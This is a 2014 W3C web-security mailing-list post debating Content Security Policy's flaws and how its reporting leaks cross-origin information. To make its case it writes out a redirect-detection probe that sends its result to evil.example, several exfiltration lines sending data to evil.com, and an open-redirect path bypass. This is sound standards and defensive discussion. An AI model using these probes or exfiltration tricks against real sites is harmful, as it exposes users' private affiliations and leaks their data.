- From: Sigbjørn Vik <sigbjorn@opera.com>
- Date: Wed, 28 May 2014 17:30:54 +0200
- To: Mike West <mkwst@google.com>
- CC: Daniel Veditz <dveditz@mozilla.com>, Joel Weinberger <jww@chromium.org>, "Oda, Terri" <terri.oda@intel.com>, Michal Zalewski <lcamtuf@coredump.cx>, Egor Homakov <homakov@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Eduardo' Vela <evn@google.com>
On 28-May-14 14:15, Mike West wrote:
> On Tue, May 27, 2014 at 11:31 AM, Sigbjørn Vik <sigbjorn@opera.com> wrote:
>
>     CSP allows more than just login detection, and makes login detection
>     even easier.
>
> What are the risks beyond login detection?

Here is an example from earlier in this thread:

-------- Original Message --------
From: Sigbjørn Vik <sigbjorn@opera.com>
Date: Tue, 20 May 2014 16:18:16 +0200

E.g. forum.org automatically redirecting me to my most used forum,
whether that be gay.forum.org, breast-cancer.forum.org or
al-quaeda.forum.org. (Apologies for getting you all flagged in the
NSA's database.)

> More saliently, if Tumblr indeed doesn't fall prey to this attack, then
> it _also_ doesn't fall prey to the CSP-based variant. Both are
> mechanisms of detecting a redirect; if the redirect doesn't happen, CSP
> won't catch it either.

You seem to be confusing image-based redirects (what the author was
looking for) with redirects in general (which is all CSP requires): the
image trick only tells you anything when the redirect target fails to
serve a valid image, whereas a CSP violation fires on the unwhitelisted
redirect itself, no matter what is served.
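To make that distinction concrete, here is a rough sketch of such a
probe (hostnames hypothetical; it assumes a browser implementing
meta-delivered policies and the securitypolicyviolation DOM event from
the CSP 1.1 draft):

    <!-- Attacker's page. The policy whitelists forum.org plus exactly
         ONE candidate redirect target per probe. -->
    <meta http-equiv="Content-Security-Policy"
          content="img-src https://forum.org https://gay.forum.org">
    <script>
      var violated = false;
      document.addEventListener("securitypolicyviolation", function () {
        violated = true; // fires only if the load, or its redirect
                         // target, fell outside the whitelist above
      });
      new Image().src = "https://forum.org/"; // redirects logged-in users
      setTimeout(function () {
        // No violation means the redirect stayed inside the whitelist,
        // i.e. it went to gay.forum.org - whether or not the target
        // served a valid image. Phone the answer home; connect-src is
        // unrestricted, as the policy above only covers img-src.
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "https://evil.example/log?went=" +
                 (violated ? "elsewhere" : "gay.forum.org"));
        xhr.send(); // cross-origin, but the request still goes out
      }, 3000);
    </script>

One candidate per policy means one document per guess, but iframes make
that cheap, and unlike the image trick this works no matter what the
redirect target serves.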
> Timing attacks and esoterica that
> Michal outlined in earlier posts[1] aside, if the platform allows you to
> read the size of an image cross-origin, then you can tell whether you
> got an image or something that wasn't an image. That's enough in the
> example I provided. Can you elaborate on a site owner's secure response
> here?

-------- Original Message --------
From: Sigbjørn Vik <sigbjorn@opera.com>
Date: Thu, 27 Feb 2014 09:59:04 +0100

Static resources such as images and scripts don't need login
protection, and can be served identically to logged-in and not
logged-in users.

(Later in the thread it was clarified that this does not necessarily
hold in all cases, just most cases.)

>     Removing the hole introduced by CSP is
>     not doable for a site owner, even if wishing to do so.
>
> Sure it is: for example, rather than automatically redirecting, the site
> could return a 403 response with a link to the login form if the user
> isn't logged in. That would still be vulnerable to a number of the
> attacks we've discussed here, but not the CSP variant.

Are you suggesting that, for site owners to protect themselves against
the hole we are creating, all cross-domain 30x responses be exchanged
for 403s? That would break a whole lot of sites, tools and use cases,
and I think this is a non-starter. Feel free to modify my statement by
adding a "practicably" in there, though.

> If lots of users are hitting your site, and you're getting violation
> reports when one of them is attacked via content injection, then you
> have the ability to fix that hole for everyone else, even if they were
> never exposed.

Agreed that reporting is good.

>     If we are serious about reporting, let us make a much better tool
>     for that, without the security issues, and which can be used not
>     only to determine the viability of CSP, but other site issues as
>     well. Random example; I would love to see a spec for a page to
>     determine the security level a browser awards it - CSP reporting
>     can't do this, and it would be silly to have one reporting tool
>     for CSP and another for this.
>
> Would you mind forking this thread with a more detailed description of
> what you're proposing here? I don't really understand either the
> complaint or the suggestion here.

I don't have a complaint :) You are saying: "Reporting in CSP is good,
even though it introduces a security hole." I am saying: "Reporting can
be made better, and without security holes. Reporting does not have to
be tied to CSP, and there are non-CSP reporting use cases."

>     In the network layer, if the page is blocked by CSP, replace it with
>     blank contents, and continue as normal. No DOM changes necessary.
>     Calling it "not trivial" might have been an exaggeration. :)
>
> How is that different/better than returning a network error, which is
> what the spec currently asks for?

It doesn't reveal to the page whether the content was loaded or not, so
there is no cross-domain leakage, which is the current problem with the
spec.

> If you set a policy of `default-src 'none'`, then it is difficult for
> injected content to exfiltrate data, as the requests to
> `evil.com/?lots-of-juicy-data` will be blocked before they hit
> evil.com.

So this is about a page where CSP has failed to protect against script
injection, a custom script is now running, and it has gathered secret
data. In this case, blocking cross-domain resource loads is meant to
stop the script from sending the secret data home? I don't think that
would be very difficult for such a script; here are a few random first
things I'd try (the first is sketched below):

* location.href="http://evil.com/?juicy_data" (optionally with a return
  redirect immediately afterwards)
* document.onclick=function(){location.href="http://evil.com/?juicy_data"}
* window.open("http://evil.com/?juicy_data")
* window.open("data:text/html,<script>location.href='http://evil.com/?juicy_data'</script>")
* HTTP over DNS (if the browser sends DNS lookups for
  juicy_data.evil.com, even without sending the request itself)
* Various other technologies: WebSockets, workers, beacon, etc.
* Cross-domain SVG fonts, or other obscure inlines
* A data: URL to a plugin which uses its own network stack

Browsers are not designed to resist a site wanting to leak data, and I
don't think they are able to. Claiming that CSP protects against this
sounds like a false promise to me.
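For instance, a minimal sketch of the first bypass (URLs hypothetical;
CSP here governs subresource loads, and a top-level navigation is not a
subresource, so `default-src 'none'` does not stop it):

    // Injected script running in a page whose policy is `default-src
    // 'none'`. XHR/images/etc. to evil.com are blocked, but navigating
    // the whole page away is not a resource load, so the data gets out.
    var juicy = document.body.textContent.slice(0, 512); // whatever was gathered
    location.href = "http://evil.com/?d=" + encodeURIComponent(juicy);
    // evil.com can answer with a 302 back to the original URL, so the
    // victim sees little more than a flicker.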
>     Let me quote you ;)
>     "More to the point, please assume that I and everyone like me is a
>     terrible programmer. :)"
>     I do not believe most web developers are going to read the CSP
>     spec, far less understand it. I believe most will find a working
>     template on stackoverflow, and copy it in uncritically.
>
> In that sad, sad world where no one reads specs, I fail to see how you
> can claim that developers would be _more_ confused. They'd already have
> no idea what's happening, relying on magic safety dust that they
> sprinkle around their sites. :)

If they do read the spec, they'd be confused. If they don't read the
spec and just sprinkle magic dust, they would be relying on magic dust
(which might simply not work). Although I am not quite certain I
understand how your comment relates to the part of my mail you quoted.

> In the current proposal, `script-src example.com/js` is equivalent to
> `script-src example.com` after a redirect. This isn't the best-case
> scenario: it is _the_ scenario. :)

For the website, yes. But the webmaster might not understand this.
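An illustration of the surprise (hostnames hypothetical; `cdn.example`
stands in for any whitelisted host with an open redirector):

    Content-Security-Policy: script-src example.com/js/ cdn.example

    <!-- What the webmaster expects the path to guarantee: -->
    <script src="https://example.com/js/app.js"></script>       allowed
    <script src="https://example.com/uploads/evil.js"></script> blocked

    <!-- What a redirect gives an attacker: cdn.example is whitelisted,
         and after its 302 the target is matched with paths ignored,
         i.e. as plain `example.com`: -->
    <script src="https://cdn.example/redir?u=https://example.com/uploads/evil.js"></script>
                                                                 allowed

The policy still reads as if only /js/ can supply script; that is
exactly the part I expect webmasters to misunderstand.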
> CSP mitigates risks.
> It isn't magic, and it isn't perfect. We explicitly state in the spec
> (3rd paragraph of the introduction) that CSP isn't the first (or only!)
> line of defense, and is intended as defense in depth. What else would
> you like us to do to make that clear?

I would like us to remove the necessity for caveats, and I would like
it to work out of the box. If we need to explain exceptions to users,
it is a sign that we didn't get the design right.

>     So the worst case scenario is that sites get
>     even less secure than before.
>
> I don't understand this conclusion. Again, `script-src example.com` is
> still significantly better than nothing. Script can't load from
> `evil.com`, for instance. That seems like a significant improvement.

Webmasters have only so much time on hand for security. (Normally not
nearly enough.) If they use their time on magic which doesn't work,
they are worse off than if they had used their time on something which
does work. If they spend time on implementing path restrictions, and it
doesn't work, they are worse off than if they hadn't. In addition, they
might actually think they are safe, making it even worse.

>     To weigh the risks, it is important to understand the threats.
>     Currently, phishing is by far the largest threat on the net, XSS is
>     miles behind. If phishing is critical severity, then XSS is only
>     high severity.
>
> They're both bad. I continue to believe that XSS is more problematic,
> but I'm not sure there are any good arguments to be made either way.
> Bad is bad. Badder is also bad. Either way: bad.

In a world where we have to choose between evils, quantifying badness
can be quite useful.

-------- Original Message --------
From: Sigbjørn Vik <sigbjorn@opera.com>
Date: Thu, 13 Feb 2014 09:50:48 +0100

Phishing is a bigger problem than XSS, according to experts[1][2][3].
[...]
[1] http://www.scmagazine.com/phishing-remains-most-reliable-cyber-fraud-mechanism/article/248998/
[2] http://www.proofpoint.com/uk/topten/index-roi.php
[3] http://www.invincea.com/wp-content/uploads/Invincea-spear-phishing-watering-hole-drive-by-whitepaper-5.17.13.pdf

> What is the scenario in which a CSP-based attack gives you leverage over
> a user in ways that (significantly?) increase the risk of phishing?

Email phishes rely on sending the user to a webpage. If I manage to get
you to visit my page, I can show you anything I want. The more I know
about you, the better I can tailor that, and CSP helps. If I use
targeted phishing, I might want to know as much as possible about the
target first, for which CSP is a great aid. CSP aids phishing even more
in untargeted phishes: random URLs left in blog comments, shady ads
(even on high profile sites), links from shady sites, or similar. If I
know you are logged in to a newspaper, presenting the "You need to log
in to read this article" login page might be all it takes. Doing that
randomly for random users would be extremely unlikely to work.

>     However, if attempted by non-knowledgeable webmasters, they risk
>     making their site less secure.
>
> Any policy, no matter how poorly constructed, is purely restrictive. "No
> inline script." "No CSS except from these 8,000 sources." etc. I do not
> understand the claim that _any_ policy makes a site less secure. That
> shouldn't be possible.

I think you misinterpret me. I am not saying that webmasters cannot
make their sites more secure with the current CSP spec. I am saying
that if they spend their time on something which doesn't work, their
site will be less secure than if they had spent their time wisely,
especially so if they think it actually worked when it didn't.

--
Sigbjørn Vik
Opera Software

Received on Wednesday, 28 May 2014 15:31:28 UTC